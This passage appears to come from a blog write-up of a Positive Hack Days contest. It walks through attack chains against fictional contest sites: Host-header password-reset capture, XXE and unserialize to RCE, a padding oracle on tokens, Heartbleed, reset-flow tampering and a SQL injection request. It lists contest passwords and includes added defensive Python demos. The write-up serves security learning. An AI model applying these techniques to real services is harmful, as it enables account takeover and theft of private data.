There is an amazing site called opencellid.org, which lets you look up base station coordinates around the world.<br /><br />Having obtained the coordinates, you just need to determine the lunch break time (excluding Sunday) and find the restaurant’s name via the good ol’ opencellid — <b>Boston Seafood&Bar</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5tVGDTv8hxs/VZ0gwxCjURI/AAAAAAAAFP8/lnciSAoVwZs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-5tVGDTv8hxs/VZ0gwxCjURI/AAAAAAAAFP8/lnciSAoVwZs/s320/6.png" width="284" /></a></div><br /><u>Correct answers: 12</u><br /><br /><b><span style="font-size: large;">2. Get intel on MiTM Mobile (mitm-mobile.phdays.com)’s marketing director.</span></b><br /><br /><i>You are required to collect info on the marketing director of MiTM Mobile.</i><br /><br /><b>2.1. We have a network capture from the director's laptop (<a href="https://mega.co.nz/#!34IEGYZa!Xowwo-UFTWMIfqfmiSPQXMWY0F7mySb-WtIxB3SVXWQ">https://mega.co.nz/#!34IEGYZa!Xowwo-UFTWMIfqfmiSPQXMWY0F7mySb-WtIxB3SVXWQ</a> ). Can you find out where he received medical treatment?</b><br />So where did he get medical help? The traffic dump reveals not only the domain login name of one of the Positive Technologies employees, but also a query to the USSU search engine.<br /><br />Judging from the banner and the cookie parameters at http://ussu.phdays.com/search.php, the search engine uses utmz tokens, just like Google. If you insert this data into the query to search.php, a contextual ad for a hospital pops up. Your next step is to search for a matching image, disregarding everything else, or, even easier, just search for the contact details from the picture. 
The correct answer is <b>Rayville Recovery</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-tn7DwZhzJAU/VZ0hQmyDZ1I/AAAAAAAAFQI/QOrE9c2chqk/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="http://1.bp.blogspot.com/-tn7DwZhzJAU/VZ0hQmyDZ1I/AAAAAAAAFQI/QOrE9c2chqk/s400/7.png" width="400" /></a></div><br /><br /><u>Correct answers: 13</u><br /><br /><b>2.2. Ok, now we know his email account. It is l_u.imbesi@ussu-gov.org - we need access (give us the email password).</b><br />Robots.txt files are often a hidden treasure of vulnerable scripts that should be kept safe from hackers, not search engines. This time is no different. There is a link to a buggy password recovery script for the mailbox, restore.php. If you call a password reset in debug mode (debug=On), you may discover that emails are sent via port 25 of the server. The server name is taken directly from the <b>Host header</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--C45d_T5UVQ/VZ0ha_p8sqI/AAAAAAAAFQQ/ZZ_QCdb24ss/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://2.bp.blogspot.com/--C45d_T5UVQ/VZ0ha_p8sqI/AAAAAAAAFQQ/ZZ_QCdb24ss/s400/8.png" width="400" /></a></div>This means that if you listen with netcat on port 25 and send a request whose Host header contains your IP address and domain name, your port 25 will receive an email indicating the current password (<b>AQwr34%!9R^</b>).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-N1zWMCH0r1M/VZ0hjEaSdXI/AAAAAAAAFQY/3DSUY-3rAoE/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://1.bp.blogspot.com/-N1zWMCH0r1M/VZ0hjEaSdXI/AAAAAAAAFQY/3DSUY-3rAoE/s640/9.png" width="640" /></a></div><br 
/><i>Bonus</i>: It was also possible to search the mailbox and find some insider info in draft emails about text messages getting cheaper at 10:30 a.m., which means that around this time the MiTM Mobile stock will be going up.<br /><br /><u>Correct answers: 4</u><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Axg3qo9w2Iw/VZ0iJrVERBI/AAAAAAAAFQk/74wTU1eKj-Y/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="http://2.bp.blogspot.com/-Axg3qo9w2Iw/VZ0iJrVERBI/AAAAAAAAFQk/74wTU1eKj-Y/s400/10.png" width="400" /></a></div><br /><b>2.3. We need to find something to blackmail him with.</b><br />Nobody managed to crack this nut, which is quite disappointing. Want to dig up some dirt on the guy? Go to his Google account! His email life might not be breathtaking, but his search history is another story:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-v7czrH0Pt4Y/VZ0iSNcemvI/AAAAAAAAFQs/Oh-USqXnAe4/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="http://3.bp.blogspot.com/-v7czrH0Pt4Y/VZ0iSNcemvI/AAAAAAAAFQs/Oh-USqXnAe4/s400/11.png" width="400" /></a></div><br />As it turned out, the marketing director decided that cocaine was much more exciting than alcohol. Too bad, man. The correct answer is <b>cocaine</b>.<br /><br /><u>Correct answers: 0</u><br /><br /><b>2.4. Some competitors with gov support also want him in jail. Who is it?<span class="Apple-tab-span" style="white-space: pre;"> </span></b><br />This technically challenging task proved to be too much for our contestants, since it requires the answer to the previous question first. In the previous task, you could see that the director regularly searches for annual reports of a certain Whoever company, located at the whoever.phdays.com domain. 
From here on it’s an easy ride:<br /><br /><ol style="text-align: left;"><li>Find api.php via robots.txt.</li><li>Fuzz api.php and use the errors it throws to guess the parameter names. Find the XXE and use it to read all the source code.</li><li>The source reveals an unserialize call in api.php, which gives us a SQL injection in an INSERT.</li><li>After a successful insertion into the table, trigger unserialize in index.php (data from the database is passed to unserialize) and, finally, get RCE.</li><li>Go to /home to find the email of the guy who owns Whoever, which is <b>wh0wh0wh0ever@gmail.com</b>.</li></ol><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">3.<span style="white-space: pre;"> </span>This time prepare the big guns. You are required to get info on the presidential administration (ussu.phdays.com)</span></b><br /><br /><b>3.1. Crawl all administration emails in order from a to z (format: <email>,<email>,<email>, ...)</b><br />The first task is easy-breezy: you just need to find all the email addresses at the Administration. 
Go to ussu.phdays.com/contacts.php.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Rn8WZM-HGfM/VZ0i0yx1D5I/AAAAAAAAFQ0/SOEucmcAEJY/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="http://1.bp.blogspot.com/-Rn8WZM-HGfM/VZ0i0yx1D5I/AAAAAAAAFQ0/SOEucmcAEJY/s640/12.png" width="640" /></a></div><br />You will see that there is an alias, <b>administration@ussu-gov.org</b>, for general requests.<br />In addition, the state department has an <b>extra MX server</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xmKiQgU3RdY/VZ0i_R7p6zI/AAAAAAAAFQ8/3AZywILuojk/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="http://4.bp.blogspot.com/-xmKiQgU3RdY/VZ0i_R7p6zI/AAAAAAAAFQ8/3AZywILuojk/s640/13.png" width="640" /></a></div><br />It looks like the government doesn’t care too much about the safety of its employees — a couple of queries is all it takes to obtain every email in the administration group:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iLE8AOFPUGc/VZ0jFEhQoQI/AAAAAAAAFRE/efNLj-tHleg/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="443" src="http://1.bp.blogspot.com/-iLE8AOFPUGc/VZ0jFEhQoQI/AAAAAAAAFRE/efNLj-tHleg/s640/14.png" width="640" /></a></div><br />The correct answer is <a href="mailto:a_o.bozhidara@ussu-gov.org">a_o.bozhidara@ussu-gov.org</a>, <a href="mailto:d_b.bertil@ussu-gov.org">d_b.bertil@ussu-gov.org</a>, <a href="mailto:j_l.andrus@ussu-gov.org">j_l.andrus@ussu-gov.org</a>, <a href="mailto:j_t.zlata@ussu-gov.org">j_t.zlata@ussu-gov.org</a><br /><br /><u>Correct answers: 19</u><br /><br /><b>3.2. 
Get all passwords, emails in order from a to z (format: <email>:<password>,<email>:<password>,<email>:<password>, ...)</b><br />From here on things start to heat up, as Google will not be able to do all the work for you. Sitemap.xml says that there is a certain file. Here it is: http://ussu.phdays.com/_logs/access.log. After some careful study, you may find the following curious requests:<br /><br /><span style="font-family: Courier New, Courier, monospace;">GET </span><br /><span style="font-family: Courier New, Courier, monospace;">/auth.php?action=getToken&id=26080&email=%61%5f%6f%2e%62%6f%7a%68%69%64%61%72%61%40%75%73%73%75%2d%67%6f%76%2e%6f%72%67</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">GET </span><br /><span style="font-family: Courier New, Courier, monospace;">/auth.php?action=checkToken&token=EShDVGIWwZSjS5I5BQbpDyWRNoFUzBOWNygG8j%2FYpbpZl7sGymRScloK%2Fddq9a6%2FAaSTXZedUHTkhONlvfd2kvB63E%2B6iqSjecSaQMRyQw1vzs5otj3%2BmP%2Fp%2BS1Xil%2BVqn7GZJPLgsgcXy4cLtcCsw%3D%3D</span><br /><br />It seems the administration employee first obtains a token and then validates it. 
If you take a closer look at the validation process, you will find that it falls to the good ol’ padding oracle attack, which means that the token can be decrypted with a modest number of queries.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-hcECr3PgTV8/VZ0kOYj_yyI/AAAAAAAAFRQ/hvCIKqdM_EM/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-hcECr3PgTV8/VZ0kOYj_yyI/AAAAAAAAFRQ/hvCIKqdM_EM/s400/15.png" width="335" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-zEsXYiwNjYE/VZ0kamkd90I/AAAAAAAAFRg/Xv0Cu8XbiLI/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://4.bp.blogspot.com/-zEsXYiwNjYE/VZ0kamkd90I/AAAAAAAAFRg/Xv0Cu8XbiLI/s400/16.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>After only 256 queries, we may claim with 99% certainty that the implementation can be attacked. Throw in another 10 000 queries — and the token goes down completely. But you will not need that many, as the password sits at the very end of the token, which means it is decrypted first.<br /><br />OK, we have one password decrypted. Now what? 
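The whole oracle is that the token check answers a tampered token in two different ways, depending on whether the CBC padding decrypted cleanly. The following is an added example, not the contest's code: a toy token validator with that same two-way failure, the encrypt-then-MAC validator that removes it, and a black-box probe a defender can run against either. The block cipher is a SHA-256 Feistel network constructed for the demo so that it needs only the standard library; the key, sample record and IV are constructed as well.

```python
import hashlib
import hmac

BLOCK, ROUNDS = 16, 8
KEY = b"constructed-demo-key"           # constructed, not a real secret
MAC_KEY = b"constructed-demo-mac-key"   # constructed, not a real secret
RECORD = b"id=42;user=alice@example.org;secret=hunter2"   # constructed sample
IV = bytes(range(BLOCK))                # fixed only so the demo is repeatable

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: 8 bytes of SHA-256(key || round || half).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Toy 128-bit block cipher standing in for AES; not a real cipher.
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # Returns iv || ciphertext, the plaintext padded with PKCS#7.
    n = BLOCK - len(plaintext) % BLOCK
    padded, out, prev = plaintext + bytes([n]) * n, [], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    if len(data) < 2 * BLOCK or len(data) % BLOCK:
        raise ValueError("bad length")
    prev, out = data[:BLOCK], []
    for i in range(BLOCK, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return pkcs7_unpad(b"".join(out))

def _record_ok(plaintext: bytes) -> bool:
    # A token must decrypt to an ASCII record shaped like RECORD above.
    try:
        text = plaintext.decode("ascii")
    except UnicodeDecodeError:
        return False
    return text.startswith("id=") and ";secret=" in text

def check_token_vulnerable(token: bytes) -> str:
    # Two distinguishable failures: this is the padding oracle.
    try:
        plaintext = cbc_decrypt(KEY, token)
    except ValueError:
        return "padding error"
    return "ok" if _record_ok(plaintext) else "invalid token"

def issue_token_hardened(record: bytes, iv: bytes) -> bytes:
    # Encrypt-then-MAC: the tag covers the IV and every ciphertext byte.
    body = cbc_encrypt(KEY, iv, record)
    return body + hmac.new(MAC_KEY, body, hashlib.sha256).digest()

def check_token_hardened(token: bytes) -> str:
    # Reject any modified token (constant-time compare) before the padding
    # is ever looked at, and give every failure the same answer.
    body, tag = token[:-32], token[-32:]
    expected = hmac.new(MAC_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return "invalid token"
    try:
        plaintext = cbc_decrypt(KEY, body)
    except ValueError:
        return "invalid token"
    return "ok" if _record_ok(plaintext) else "invalid token"

def padding_oracle_leaks(validate, token: bytes) -> bool:
    # Black-box probe: walk every byte of a valid token through all 256 values;
    # more than one kind of rejection means the padding result is observable.
    failures = set()
    for pos in range(len(token)):
        for value in range(256):
            tampered = bytearray(token)
            tampered[pos] = value
            reply = validate(bytes(tampered))
            if reply != "ok":
                failures.add(reply)
    return len(failures) > 1
```

Run `padding_oracle_leaks(check_token_vulnerable, cbc_encrypt(KEY, IV, RECORD))` to see the leak, and the same probe against `issue_token_hardened(RECORD, IV)` with `check_token_hardened` to see it closed.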
Plugging in the emails obtained earlier and going through the IDs in sequence, we get the tokens for all four users.<br /><br />Sign into one of the email accounts via Google to find another piece of insider info on price fluctuations of company stocks.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-7AvsDFNlOcU/VZ0kV2kH_4I/AAAAAAAAFRc/QKpO10-2-xU/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://3.bp.blogspot.com/-7AvsDFNlOcU/VZ0kV2kH_4I/AAAAAAAAFRc/QKpO10-2-xU/s640/17.png" width="640" /></a></div><b>The correct answer is a_o.bozhidara@ussu-gov.org:zhi37@1!,d_b.bertil@ussu-gov.org:bertiB3rt!,j_l.andrus@ussu-gov.org:Andrus331,j_t.zlata@ussu-gov.org:aata4444</b><br /><br /><u>Correct answers: 6</u><br /><br />For those interested in finding out more about padding oracle attacks, we suggest this article:<br /><br /><a href="https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth">https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth</a><br /><br />Here are the slides about protecting applications from this and other attacks:<br /><br /><a href="http://www.slideshare.net/kochetkov.vladimir/hdswasm-russianproofreaded">http://www.slideshare.net/kochetkov.vladimir/hdswasm-russianproofreaded</a><br /><br /><b>3.3. Hack into Mac OS of the Administration secretary and give us # of the document printed for the president 14/05/2015.</b><br />Hacking the secretary’s Mac OS is a no-brainer. 
Especially if said secretary leaves clues in the email signature, likes to store important archives in repositories, and reuses <b>the same password</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-C3_dSrAyPeM/VZ0k9w6gbHI/AAAAAAAAFRo/oBHmkRVVvr0/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://1.bp.blogspot.com/-C3_dSrAyPeM/VZ0k9w6gbHI/AAAAAAAAFRo/oBHmkRVVvr0/s400/18.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Wj7kqBoPySk/VZ0lCR4YdoI/AAAAAAAAFRw/mmD55-YB_Cs/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="http://1.bp.blogspot.com/-Wj7kqBoPySk/VZ0lCR4YdoI/AAAAAAAAFRw/mmD55-YB_Cs/s400/19.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Take Chainbreaker for Win32 and decrypt the keychain from the repository using the email password. The document number is #125_42-19.501.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DVJZ3nsS2fs/VZ0lJKJ12uI/AAAAAAAAFR4/1Ode22BlDSo/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="http://2.bp.blogspot.com/-DVJZ3nsS2fs/VZ0lJKJ12uI/AAAAAAAAFR4/1Ode22BlDSo/s640/20.png" width="640" /></a></div><br />As a bonus, note the interesting info that “<b>Promising quarterly reports for Choo Choo Roads (CHOO), Hacknetcom (HCKNT), and MiTM Mobile (MITM)</b>” will be published on May 27 at 11 a.m.<br /><br /><u>Correct answers: 3</u><br /><br /><b>3.4. Now we need to get this document. Give us a project name mentioned in it.</b><br />It’s time to delve into the administration resources once again. 
If you use the hint and log in as <a href="mailto:d_b.bertil@ussu-gov.org">d_b.bertil@ussu-gov.org</a>, you will find an interesting address with anonymous access via FTP in Google Cloud Printers <a href="https://www.google.com/cloudprint">https://www.google.com/cloudprint</a>. Among hundreds of documents, there lies the one you need – something about the Omnieye project.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uteDtjLhqMY/VZ0lWsUBvfI/AAAAAAAAFSA/K8TT7Lo8EHY/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-uteDtjLhqMY/VZ0lWsUBvfI/AAAAAAAAFSA/K8TT7Lo8EHY/s640/21.png" width="344" /></a></div>It also contains some <b>interesting info</b> about future stock rates and “Black Thursday”.<br /><br /><u>Correct answers: 0</u><br /><br /><b>3.5. Finally, break into an iPhone of one of the administration employees. There was some secret meeting in April. Where?</b><br />The participants failed to get to this task. Otherwise, they could possibly restore access to icloud.com using an email, password, and token to reset 2FA, which could be found in <a href="mailto:j_l.andrus@ussu-gov.org">j_l.andrus@ussu-gov.org</a>. 
Then you just needed to find the note about a meeting in <b>McDonalds on Pushkin Square</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-tFGTqMAlsEI/VZ0lrQbuEUI/AAAAAAAAFSI/In70c3yr2Zs/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="http://3.bp.blogspot.com/-tFGTqMAlsEI/VZ0lrQbuEUI/AAAAAAAAFSI/In70c3yr2Zs/s400/22.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-97pQSSWIvoU/VZ0l2HWAFFI/AAAAAAAAFSQ/ST40G1Hl8kg/s1600/23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="http://3.bp.blogspot.com/-97pQSSWIvoU/VZ0l2HWAFFI/AAAAAAAAFSQ/ST40G1Hl8kg/s400/23.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">4. We need proof that the government controls Positive Times (ptimes.phdays.com)</span></b><br /><br /><i>The participants were required to gather evidence that the Positive Times media giant has been under the government’s thumb for a long time.</i><br /><br /><b>4.1. Get the journalist's (w_j.dom@ussu-gov.org) mobile number - he is a rat. Tip: he always uses two accounts for privacy in social networks. (format, no delimiters: +7xxxxxxxxx#xxxxxxx)</b><br />Once again, the first task turns out to be easy – just get the journalist’s phone number. He seems to be suffering from multiple personality disorder — 2 accounts on VK.com and another 2 on FB.com. 
Find the first account using the password reset function on FB.com.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-uFCCj-KQVFI/VZ0l92JCPGI/AAAAAAAAFSY/ltrHn4iVNLU/s1600/24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://4.bp.blogspot.com/-uFCCj-KQVFI/VZ0l92JCPGI/AAAAAAAAFSY/ltrHn4iVNLU/s640/24.png" width="640" /></a></div>Find the vk.com one by comparing names in the list of people who liked <a href="http://ptimes.phdays.com/">ptimes.phdays.com</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-QsTZOctmDrs/VZ0mErhRzhI/AAAAAAAAFSg/gaeLYqgg3Zw/s1600/25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://2.bp.blogspot.com/-QsTZOctmDrs/VZ0mErhRzhI/AAAAAAAAFSg/gaeLYqgg3Zw/s640/25.png" width="640" /></a></div><br />You may see that the only one who fits is the person at <a href="https://vk.com/id304632346">https://vk.com/id304632346</a>. 
On his page, you will find the first part of his mobile number and his email.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ddsRfyI1gAg/VZ0mNudG0_I/AAAAAAAAFSo/v-IpeiUaSPI/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="http://1.bp.blogspot.com/-ddsRfyI1gAg/VZ0mNudG0_I/AAAAAAAAFSo/v-IpeiUaSPI/s400/26.png" width="400" /></a></div><br />If you try to restore the FB account with this email, you’ll see it’s the same guy.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-0Uemu3WNGgY/VZ0mT-CI95I/AAAAAAAAFSw/7cbMG9hE2i0/s1600/27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="http://3.bp.blogspot.com/-0Uemu3WNGgY/VZ0mT-CI95I/AAAAAAAAFSw/7cbMG9hE2i0/s400/27.png" width="400" /></a></div><br />Now that you have found his account via his FB email, look at the Details section and you’ll see the missing part of the phone number. The correct answer is <b>+79652843472#317</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bZsw8C6tNmE/VZ0mbUEkZ0I/AAAAAAAAFS4/lhw6QCbXZY0/s1600/28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="http://2.bp.blogspot.com/-bZsw8C6tNmE/VZ0mbUEkZ0I/AAAAAAAAFS4/lhw6QCbXZY0/s400/28.png" width="400" /></a></div><br /><i>Note</i>: We had to use “an extension number” to rule out any attempt to brute-force it.<br /><br /><u>Correct answers: 34</u><br /><br /><b>4.2. Get access to the publishing engine of Positive Times. Give us user and password. (format: <email>:<password>)</b><br />Now you are required to gain access to the Positive Times portal admin panel. Let us guess. 
From sitemap.xml you found the list of emails that password resets are sent to (the sentemails.log file), you even received an email with a password reset token, and changed a password using the public inbox from the list, <a href="mailto:ptimes-registration@mailinator.com">ptimes-registration@mailinator.com</a>. But this account doesn’t have a sufficient privilege level to do anything useful! Well, duh, what did you expect? Some shabby email box being used for administrative stuff? Dream on.<br /><br />However, if you take a close look at the password reset process, you just might see the light at the end of the tunnel: at the last stage, the system checks the email again.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-9STThNGIzHs/VZ0mmFkXquI/AAAAAAAAFTA/_udgLDkJdBI/s1600/29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="http://3.bp.blogspot.com/-9STThNGIzHs/VZ0mmFkXquI/AAAAAAAAFTA/_udgLDkJdBI/s400/29.png" width="400" /></a></div><br />Why? What if we change the email to a more privileged one from sentemails.log, say, to <a href="mailto:ptimes@ussu-gov.org">ptimes@ussu-gov.org</a>? Bingo! You receive an email with the correct password on Mailinator, and can now answer the question. As a bonus, you gain access to the admin panel with the account ptimes@ussu-gov.org:Pt1M3P@ss. 
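The flaw in that reset flow is that the final step trusts an address re-submitted by the client instead of the address the token was mailed to. As an added example (not the Positive Times engine's code, with constructed accounts), here is that last step in its vulnerable and its corrected form:

```python
import secrets

# Constructed demo accounts, not the contest's data: a publicly readable
# registration mailbox with ordinary rights and a privileged editor account.
USERS = {
    "registration@example.org": {"password": "old-user-pw", "role": "user"},
    "editor@example.org": {"password": "old-admin-pw", "role": "admin"},
}


class ResetFlow:
    """Two-step password reset: a token is mailed to the address that asked
    for it, then the final form submits the token and the new password."""

    def __init__(self, users):
        self.users = {email: dict(rec) for email, rec in users.items()}
        self.tokens = {}          # token -> address the token was mailed to

    def request_reset(self, email):
        """Step 1: issue a single-use token for an existing account."""
        if email not in self.users:
            return None
        token = secrets.token_hex(16)
        self.tokens[token] = email
        return token              # would only ever leave the system by email

    def complete_vulnerable(self, token, email, new_password):
        """Step 2 as the contest engine did it: the token only proves that
        some reset was started; which account to change comes from the form,
        so a token mailed to the public inbox resets the privileged account."""
        if token not in self.tokens or email not in self.users:
            return False
        self.users[email]["password"] = new_password
        return True

    def complete_hardened(self, token, new_password):
        """Step 2 done right: the account is the one bound to the token, the
        token is consumed, and the form has no email field to tamper with."""
        email = self.tokens.pop(token, None)
        if email is None:
            return False
        self.users[email]["password"] = new_password
        return True
```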
Once inside, you may find out two things: that the tax is being raised and that the government is cherry-picking companies.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_SyzNSDroRU/VZ0mu-qVHXI/AAAAAAAAFTI/X5ricd0c_Fw/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-_SyzNSDroRU/VZ0mu-qVHXI/AAAAAAAAFTI/X5ricd0c_Fw/s400/30.png" width="400" /></a></div><br />Besides insider info, this interface gives you an opportunity to change the second news item (so that it would work in favor of those who play against the market). We would then have had it published on the second day of the contest at 11:30. Alas, either we overestimated the participants, or the fictional news just got buried under thousands of useless requests sent in an attempt to exploit nonexistent XSS and SQLi.<br /><br /><u>Correct answers: 13</u><br /><br /><b>4.3. Get access to the email account of another corrupt journalist. His email is mediagov@ussu-gov.org. Give us his password.</b><br />To accomplish this task, you just needed to notice the form <a href="http://ptimes.phdays.com/feedback.php">http://ptimes.phdays.com/feedback.php</a> and, with the hint from Google, to realize that you could somehow upload files to the feedbackupload folder. 
After uncommenting the file upload field in the form and uploading an empty .htaccess file, you could obtain the feedbackupload directory listing for 5 minutes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-HmsCXw4pkjk/VZ0nEPJqZnI/AAAAAAAAFTQ/kCYicb0DL90/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://1.bp.blogspot.com/-HmsCXw4pkjk/VZ0nEPJqZnI/AAAAAAAAFTQ/kCYicb0DL90/s640/31.png" width="640" /></a></div><br />After that, it would be a piece of cake to find the file uploaded-13-05-2015.docx owned by <a href="mailto:mediagov@ussu-gov.org">mediagov@ussu-gov.org</a> in the directory and realize that all images were taken from <a href="https://188.166.78.21/">https://188.166.78.21:443/</a>. Following the MSF hint, use the Heartbleed exploit from the Metasploit pack (there were some other exploit options that would have worked as well, but not all of them) at that address and get the user password from the memory dump:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MOiSAKzxW0g/VZ0nUjWgaDI/AAAAAAAAFTY/UFCthkt0Xpo/s1600/32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://4.bp.blogspot.com/-MOiSAKzxW0g/VZ0nUjWgaDI/AAAAAAAAFTY/UFCthkt0Xpo/s400/32.png" width="400" /></a></div><br />Also, don’t forget: <a href="https://www.acunetix.com/websitesecurity/Why-File-Upload-Forms-are-a-Major-Security-Threat.pdf">https://www.acunetix.com/websitesecurity/Why-File-Upload-Forms-are-a-Major-Security-Threat.pdf</a>.<br /><br />The correct answer is <b>P@S$W0_PD</b>.<br /><br /><u>Correct answers: 1</u><br /><br /><b>4.4. We found a group of hackers called PositiveLeaks. They may help us in our business. Find their leader's name for us.</b><br />Here are the WikiLeaks-style enthusiasts who are also trying to dig something up on Positive Times. 
Judging from their name, they should be at pleaks.phdays.com. Also, with this request:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /userPage HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: pleaks.phdays.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Cookie: PHPSESSID=rr47fgk7e2rckklqj5kgl4f6k5</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Type: multipart/form-data; boundary=---------------------------214580240818081871851160929598</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Length: 376</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">-----------------------------214580240818081871851160929598</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="template"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">123%' union select 